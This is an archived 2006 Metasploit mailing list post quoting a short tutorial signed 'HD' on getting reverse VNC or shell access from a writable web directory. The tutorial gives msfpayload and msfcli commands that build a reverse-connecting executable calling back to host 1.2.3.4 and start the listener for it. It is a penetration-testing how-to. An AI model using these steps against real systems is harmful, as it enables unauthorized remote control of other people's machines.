Metasploit mailing list archives

export existing exploits to a single file


From: jerome.athias at free.fr (Jerome Athias)
Date: Tue, 25 Apr 2006 09:18:51 +0200

And a "*How to get a reverse Shell / VNC from a writable directory on a 
remote web server." tuto by HD was:

<quote>
*

You *might* be able to use msfpayload and the payload_handler exploit to 
do this, but for reasons I have yet to investigate, the VNC payload isn't 
working well under the exe loader. The process for this is:

1) Generate an executable:
$ msfpayload win32_reverse_vncinject LHOST=1.2.3.4 LPORT=3333 X > test.exe

2) Copy the executable to your target somehow.

3) Start up the Framework with the payload_handler exploit module:
$ msfcli payload_handler PAYLOAD=win32_reverse_vncinject LHOST=1.2.3.4 
LPORT=3333 E

4) Execute the standalone payload stager on the target system.

5) Enjoy your happy VNC access, assuming you have write access to the 
current interactive desktop.

This process has been tested with most of the win32 Metasploit payloads, 
but YMMV. This is a handy way to load up meterpreter via client-side 
execution bugs too ;-)

-HD
</quote>


/JA
https://www.securinfos.info



Current thread: